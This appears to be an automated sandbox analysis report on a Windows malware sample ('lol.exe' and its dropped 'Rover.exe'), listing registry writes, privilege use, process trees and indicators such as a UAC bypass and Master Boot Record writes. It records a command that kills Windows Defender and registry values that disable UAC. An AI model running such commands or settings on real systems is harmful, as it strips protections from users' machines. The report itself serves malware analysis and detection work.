description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/vnd.adobe.xdp+xml\Extension = ".xdp" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9B4CD3EA-4981-101B-9CA8-9240CE2738AE}\TypeLib\Version = "1.1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{17F2E344-8227-4AA7-A25A-E89424566BBA}\InProcServer32\ = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroBroker.exe\"" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F0B4F6AD-5E09-4CB1-B763-EC390CBDE51D}\MiscStatus\1\ = "131473" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9B4CD3E6-4981-101B-9CA8-9240CE2738AE}\TypeLib\Version = "1.1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\acrobat\shell\open\command\ = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe\" /u \"%1\"" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{17F2E344-8227-4AA7-A25A-E89424566BBA}\InProcServer32\ThreadingModel = "Both" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F0B4F6AD-5E09-4CB1-B763-EC390CBDE51D}\TypeLib MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F0B4F6AD-5E09-4CB1-B763-EC390CBDE51D}\AppID MsiExec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{17F2E344-8227-4AA7-A25A-E89424566BBA} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{17F2E344-8227-4AA7-A25A-E89424566BBA}\ = "PSFactoryBuffer" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9B4CD3F0-4981-101B-9CA8-9240CE2738AE}\ = "CAcroHiliteList" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{12BA069D-0FC6-4577-97C6-5DF634CE6E84}\NumMethods msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{BE79C475-D632-4A57-91B3-DA044FA27CDA}\1.0\0\win32\ = "C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\adoberfp.dll" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{BD57A9B2-4E7D-4892-9107-9F4106472DA4}\VersionIndependentProgID msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B801CA65-A1FC-11D0-85AD-444553540000}\MiscStatus\ = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7CD069A1-50AA-11D1-B8F0-00A0C9259304}\Programmable\ msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D38406DA-E8AA-484b-B80D-3D3DBDCC2FB2} MsiExec.exe Key created \REGISTRY\MACHINE\Software\Classes\.fdf msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2DEA7885-1846-411F-A41E-017A8FD778FF}\ = "_AcroAXDocEventSink" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{671B6145-4169-4ADD-9AF3-E6990EB2B325}\InProcServer32\ThreadingModel = "Both" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AcroBroker.Broker.1\ = "Broker Class" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{0F6D3808-7974-4B1A-94C2-3200767EACE8}\1.0\FLAGS msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F0B4F6AD-5E09-4CB1-B763-EC390CBDE51D}\InprocServer32 MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/vnd.adobe.xfdf\Extension = ".xfdf" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\.pdf msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\.pdf\OpenWithList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8D46C1B6-BBAB-450D-A61F-4DDC898B21D4}\TypeLib\ = "{41C5FFFE-36DD-415D-9ED0-2976A342A1C8}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{673E8454-7646-11D1-B90B-00A0C9259304} msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\PDXFileType\shell\Read\command msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\acrobat2018\DefaultIcon\ = "C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{62776AC3-A015-4BA5-A1C7-DCD765881249} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D3F22039-E3CF-4FC4-9A30-426A46056B8C}\ = "IBroker" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AcroExch.pdfxml\CurVer\ = "AcroExch.pdfxml.1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AcroBroker.Broker\CurVer\ = "AcroBroker.Broker.1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{17F2E344-8227-4AA7-A25A-E89424566BBA}\InprocServer32 MsiExec.exe Key created \REGISTRY\MACHINE\Software\Classes\acrobat2018 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\MIME\Database\Content Type\application/vnd.adobe.xfd+xml msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{BE79C475-D632-4A57-91B3-DA044FA27CDA}\1.0\FLAGS\ = "0" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{CA8A9780-280D-11CF-A24D-444553540000}\EnableFullPage\.xfd msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\AcroExch.Document.DC\CLSID msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AcroExch.Document.7\shell\read\Command\ = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe\" \"%1\"" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\AFormAut.App\CurVer msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AFormAut.App.1\CLSID\ = "{7CD069A1-50AA-11D1-B8F0-00A0C9259304}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{9B4CD3E8-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\AcroExch.Document.DC\shell\Print\command msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDE0D630-7801-47cd-984E-1F0AFBC5ACBF}\InprocServer32\ = "C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\adoberfp.dll" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\68AB67CA7DA73301B744CAF070E41400 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.pdf MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8A9780-280D-11CF-A24D-444553540000}\EnableFullPage MsiExec.exe Key created \REGISTRY\MACHINE\Software\Classes\acrobat2018\shell\open\ddeexec\topic msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/vnd.adobe.xfd+xml\CLSID = "{CA8A9780-280D-11CF-A24D-444553540000}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.acrobatsecuritysettings\OpenWithProgids\ msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AcroExch.Plugin\DefaultIcon\ = "C:\\Windows\\Installer\\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\\APIFile_8.ico,0" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\AcroExch.pdfxml\CurVer msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.WSH\ = "txtfile" ccqytjrniv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AFormAut.App\ = "AFormApp Class" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs ccqytjrniv.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{566A7BC7-B295-41B7-A818-12F9E5CA46CA}\NumMethods msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{671B6145-4169-4ADD-9AF3-E6990EB2B325} msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F0B4F6AD-5E09-4CB1-B763-EC390CBDE51D}\Control MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\PDFPrevHndlr.PDFPreviewHandler\CLSID\ = "{DC6EFB56-9CFA-464D-8880-44885D7DC193}" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\.pdx\OpenWithProgids\AcroExch.AcrobatPDXFileType = "0" MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8A9780-280D-11CF-A24D-444553540000}\EnableFullPage\.fdf MsiExec.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 4572 NOTEPAD.EXE -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
pid Process 5716 WINWORD.EXE 5716 WINWORD.EXE 480 vlc.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2788 msedge.exe 2788 msedge.exe 3108 msedge.exe 3108 msedge.exe 6120 msedge.exe 6120 msedge.exe 3400 identity_helper.exe 3400 identity_helper.exe 5368 powershell.exe 5368 powershell.exe 5368 powershell.exe 5652 jaffa.exe 5652 jaffa.exe 5652 jaffa.exe 5652 jaffa.exe 5652 jaffa.exe 5652 jaffa.exe 5652 jaffa.exe 5652 jaffa.exe 5652 jaffa.exe 5652 jaffa.exe 5652 jaffa.exe 5652 jaffa.exe 5652 jaffa.exe 5652 jaffa.exe 5652 jaffa.exe 5652 jaffa.exe 1768 sphkjhlphydlbbz.exe 1768 sphkjhlphydlbbz.exe 796 ccqytjrniv.exe 796 ccqytjrniv.exe 1768 sphkjhlphydlbbz.exe 1768 sphkjhlphydlbbz.exe 1768 sphkjhlphydlbbz.exe 1768 sphkjhlphydlbbz.exe 796 ccqytjrniv.exe 796 ccqytjrniv.exe 1768 sphkjhlphydlbbz.exe 1768 sphkjhlphydlbbz.exe 796 ccqytjrniv.exe 796 ccqytjrniv.exe 796 ccqytjrniv.exe 796 ccqytjrniv.exe 2784 xpxlzrjv.exe 2784 xpxlzrjv.exe 796 ccqytjrniv.exe 796 ccqytjrniv.exe 2784 xpxlzrjv.exe 2784 xpxlzrjv.exe 2784 xpxlzrjv.exe 2784 xpxlzrjv.exe 2784 xpxlzrjv.exe 2784 xpxlzrjv.exe 3308 oxurcpmxhhmap.exe 3308 oxurcpmxhhmap.exe 3308 oxurcpmxhhmap.exe 3308 oxurcpmxhhmap.exe 3308 oxurcpmxhhmap.exe 3308 oxurcpmxhhmap.exe 3308 oxurcpmxhhmap.exe 3308 oxurcpmxhhmap.exe 3308 oxurcpmxhhmap.exe 3308 oxurcpmxhhmap.exe 3308 oxurcpmxhhmap.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 5900 ac3.exe 480 vlc.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4420 taskkill.exe Token: SeDebugPrivilege 1360 Rover.exe Token: SeDebugPrivilege 5604 scary.exe Token: SeDebugPrivilege 5988 taskkill.exe Token: SeDebugPrivilege 5540 taskkill.exe Token: SeDebugPrivilege 5700 Romilyaa.exe Token: SeDebugPrivilege 5984 taskkill.exe Token: SeSystemtimePrivilege 564 cmd.exe Token: SeSystemtimePrivilege 564 cmd.exe Token: SeDebugPrivilege 5368 powershell.exe Token: 33 5444 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 5444 AUDIODG.EXE Token: SeDebugPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe Token: SeTakeOwnershipPrivilege 1360 Rover.exe -
Suspicious use of FindShellTrayWindow 62 IoCs
pid Process 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 5700 Romilyaa.exe 5652 jaffa.exe 5652 jaffa.exe 5652 jaffa.exe 1768 sphkjhlphydlbbz.exe 1768 sphkjhlphydlbbz.exe 1768 sphkjhlphydlbbz.exe 796 ccqytjrniv.exe 796 ccqytjrniv.exe 796 ccqytjrniv.exe 2784 xpxlzrjv.exe 2784 xpxlzrjv.exe 2784 xpxlzrjv.exe 3308 oxurcpmxhhmap.exe 3308 oxurcpmxhhmap.exe 3308 oxurcpmxhhmap.exe 5580 xpxlzrjv.exe 5580 xpxlzrjv.exe 5580 xpxlzrjv.exe 3108 msedge.exe 480 vlc.exe 480 vlc.exe 480 vlc.exe 480 vlc.exe 480 vlc.exe 480 vlc.exe 480 vlc.exe 480 vlc.exe 480 vlc.exe 480 vlc.exe 1360 Rover.exe 2320 AcroRd32.exe 5840 firefox.exe 5840 firefox.exe 5840 firefox.exe 5840 firefox.exe 5700 Romilyaa.exe -
Suspicious use of SendNotifyMessage 48 IoCs
pid Process 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 3108 msedge.exe 5700 Romilyaa.exe 5652 jaffa.exe 5652 jaffa.exe 5652 jaffa.exe 1768 sphkjhlphydlbbz.exe 1768 sphkjhlphydlbbz.exe 1768 sphkjhlphydlbbz.exe 796 ccqytjrniv.exe 796 ccqytjrniv.exe 796 ccqytjrniv.exe 2784 xpxlzrjv.exe 2784 xpxlzrjv.exe 2784 xpxlzrjv.exe 3308 oxurcpmxhhmap.exe 3308 oxurcpmxhhmap.exe 3308 oxurcpmxhhmap.exe 5580 xpxlzrjv.exe 5580 xpxlzrjv.exe 5580 xpxlzrjv.exe 480 vlc.exe 480 vlc.exe 480 vlc.exe 480 vlc.exe 480 vlc.exe 480 vlc.exe 480 vlc.exe 480 vlc.exe 480 vlc.exe 5840 firefox.exe 5840 firefox.exe 5840 firefox.exe 1360 Rover.exe 1360 Rover.exe 1360 Rover.exe 1360 Rover.exe 5700 Romilyaa.exe -
Suspicious use of SetWindowsHookEx 29 IoCs
pid Process 5700 Romilyaa.exe 5716 WINWORD.EXE 5716 WINWORD.EXE 5716 WINWORD.EXE 5716 WINWORD.EXE 5716 WINWORD.EXE 5716 WINWORD.EXE 5716 WINWORD.EXE 480 vlc.exe 2320 AcroRd32.exe 2320 AcroRd32.exe 2320 AcroRd32.exe 2320 AcroRd32.exe 2320 AcroRd32.exe 2320 AcroRd32.exe 2320 AcroRd32.exe 2320 AcroRd32.exe 5840 firefox.exe 5840 firefox.exe 5840 firefox.exe 5840 firefox.exe 5840 firefox.exe 5840 firefox.exe 5840 firefox.exe 5840 firefox.exe 5840 firefox.exe 5840 firefox.exe 2964 LogonUI.exe 2964 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 236 wrote to memory of 3568 236 lol.exe 79 PID 236 wrote to memory of 3568 236 lol.exe 79 PID 3568 wrote to memory of 5056 3568 loader.exe 82 PID 3568 wrote to memory of 5056 3568 loader.exe 82 PID 5056 wrote to memory of 564 5056 cmd.exe 84 PID 5056 wrote to memory of 564 5056 cmd.exe 84 PID 564 wrote to memory of 4420 564 cmd.exe 86 PID 564 wrote to memory of 4420 564 cmd.exe 86 PID 564 wrote to memory of 1360 564 cmd.exe 89 PID 564 wrote to memory of 1360 564 cmd.exe 89 PID 564 wrote to memory of 1360 564 cmd.exe 89 PID 564 wrote to memory of 3108 564 cmd.exe 90 PID 564 wrote to memory of 3108 564 cmd.exe 90 PID 3108 wrote to memory of 2952 3108 msedge.exe 93 PID 3108 wrote to memory of 2952 3108 msedge.exe 93 PID 564 wrote to memory of 3952 564 cmd.exe 94 PID 564 wrote to memory of 3952 564 cmd.exe 94 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2260 3108 msedge.exe 95 PID 3108 wrote to memory of 2788 3108 msedge.exe 96 PID 3108 wrote to memory of 2788 3108 msedge.exe 96 PID 3108 wrote to memory of 3656 3108 msedge.exe 97 PID 3108 wrote to memory of 3656 3108 msedge.exe 97 PID 3108 wrote to memory of 3656 3108 msedge.exe 97 PID 3108 wrote to memory of 3656 3108 msedge.exe 97 PID 3108 wrote to memory of 3656 3108 msedge.exe 97 -
System policy modification 1 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "1" Rover.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Rover.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\lol.exe"C:\Users\Admin\AppData\Local\Temp\lol.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:236 -
C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\loader.exe"C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\loader.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\temp.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K main.cmd4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Windows\system32\taskkill.exetaskkill /f /im WindowsDefender.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4420
-
-
C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\Rover.exeRover.exe5⤵
- Modifies WinLogon for persistence
- UAC bypass
- Drops file in Drivers directory
- Manipulates Digital Signatures
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- System policy modification
PID:1360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\web.htm5⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3108 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff826ce3cb8,0x7ff826ce3cc8,0x7ff826ce3cd86⤵PID:2952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:26⤵PID:2260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 /prefetch:36⤵
- Suspicious behavior: EnumeratesProcesses
PID:2788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:86⤵PID:3656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3120 /prefetch:16⤵PID:3308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:16⤵PID:3576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:16⤵PID:592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:16⤵PID:4896
-
-
